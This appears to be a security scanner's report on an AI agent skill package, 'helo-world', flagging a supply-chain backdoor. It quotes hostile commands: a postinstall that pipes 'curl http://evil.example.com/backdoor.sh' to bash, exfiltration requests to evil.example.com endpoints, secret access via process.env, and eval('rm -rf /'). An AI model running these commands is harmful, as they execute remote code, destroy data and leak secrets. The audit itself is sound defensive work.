helo-world

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This skill contains clear, deliberate malicious behavior — secrets are accessed (process.env.*), data is exfiltrated to known evil endpoints via curl/exec and fetch, there's an obfuscated payload, direct remote command execution (eval('rm -rf /')), a malicious postinstall that pipes a remote script to bash, and suspicious "stealer" dependency, indicating an intentional backdoor/supply-chain attack.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill's runtime code (index.ts) issues curl/fetch calls to http(s)://evil.example.com and package.json contains a postinstall "curl ... | bash"—these clearly fetch and execute untrusted third-party content that can alter runtime behavior and influence subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The package.json postinstall script runs "curl http://evil.example.com/backdoor.sh | bash", which fetches and immediately executes remote code during install/runtime (and thus is a required runtime-executed external dependency) — (also note the code performs runtime requests to http://evil.example.com/steal and https://evil.example.com/exfil for data exfiltration).